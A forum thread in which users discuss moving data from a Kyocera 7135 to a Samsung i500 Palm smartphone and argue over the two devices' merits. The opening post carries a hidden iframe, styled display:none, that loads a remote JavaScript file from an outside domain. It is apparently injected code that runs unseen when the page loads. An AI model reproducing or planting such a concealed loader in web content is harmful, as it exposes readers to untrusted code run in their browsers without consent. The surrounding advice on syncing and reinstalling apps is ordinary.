+ Reply to Thread

gave up the kyocera 7135 how do i transfer its info to my new sch-i500

gave up the kyocera 7135 how do i transfer its info to my new sch-i500?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    very carefully!

these are 2 different puppies, even though they are palm devices.

contacts, to do's, calendar entries.. ya know, the PIM info.. this stuff can simply be beamed over to the new device.

but any 3rd party apps/programs/hacks SHOULD be manually installed and not simply synced over. you will come to find out than not all programsd will work on all palm devices.

so rename your backup/archive folders in your C:\Palm directory and then do a virgin sync (do not sync any apps on the first sync). this will generate a new backup and archive folder. if you are not suing desktop 4.1 now would be a good time to upgrade to it.

if you follow those simple instructions yo uwiil save yourself a lot of grief down the road...

welcome to the i5 family!

gave up the kyocera 7135...

Why would you give up Kyocera 7135. Isn't that a better product??? Most of us would have blindly taken 7135 over I500 had Sprint been smart enough to offer it. My opinion is that Samsung I500 is definately an improvement over Kyo 6035 but does not have all the features that 7135 offers. For now, I reluctantly adopted I500 for lack of a better offer from Sprint. Don't take me wrong I500 is certainly a vast improvement over 6035. Just curious to know your rationale.
    Scrambled

I disagree, I would have taken the i500 over the 7135 any day of the week. The SD slot is nice, but I dont think I would have used it much, and would have grown tired of the huge size in little time.

Originally posted by scrambled
    gave up the kyocera 7135...

Why would you give up Kyocera 7135. Isn't that a better product??? Most of us would have blindly taken 7135 over I500 had Sprint been smart enough to offer it. My opinion is that Samsung I500 is definately an improvement over Kyo 6035 but does not have all the features that 7135 offers. For now, I reluctantly adopted I500 for lack of a better offer from Sprint. Don't take me wrong I500 is certainly a vast improvement over 6035. Just curious to know your rationale.

Second loudly voiced vote for fresh install of apps. This will save you hours of grief. You may also find it saves you some space, depending on how many trials, samples and tests you installed on your 7135. Since you don't have any external memory, saving space should be a priority.

I absolutely love my 7135 (and I use the SD card and the speakerphone), but some people want the smaller size...we are all one big smartphone family

Did ya sell the 7135 yet???

The SD slot is nice, but I dont think I would have used it much, and would have grown tired of the huge size in little time..

I am sorry but an lack of an SD slot is the biggest shortcoming of I500. I don't 7135's footprint is much bigger. I filled up my 16 megs real fast and I have no room to grow
    Scrambled

PHO
    Broward County Florida, "Home of the Hanging Chad"

Re: gave up the kyocera 7135 how do i transfer its info to my new sch-i500

Originally posted by arharris23
    gave up the kyocera 7135 how do i transfer its info to my new sch-i500?
    FYI there is an SPH i500 and an SCH i600

your posting in the SPH i500, and its probably a typo, but just wanted to make sure.

Aaron
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

Different strokes I suppose, I have had mine since the day it came out and the closest I have come to filling it up is 10mbs. I have a separate PocketPC if I want to do heavy duty stuff or memory/file intensive stuff.

Originally posted by scrambled
    The SD slot is nice, but I dont think I would have used it much, and would have grown tired of the huge size in little time..

I am sorry but an lack of an SD slot is the biggest shortcoming of I500. I don't 7135's footprint is much bigger. I filled up my 16 megs real fast and I have no room to grow

Originally posted by SpineDoc
    I have had mine since the day it came out and the closest I have come to filling it up is 10mbs. I have a separate PocketPC if I want to do heavy duty stuff or memory/file intensive stuff.
    So the truth comes out. So much for your i500 and Palm loyalty. You use Pocket PC!!!!!! for real stuff.
    Scrambled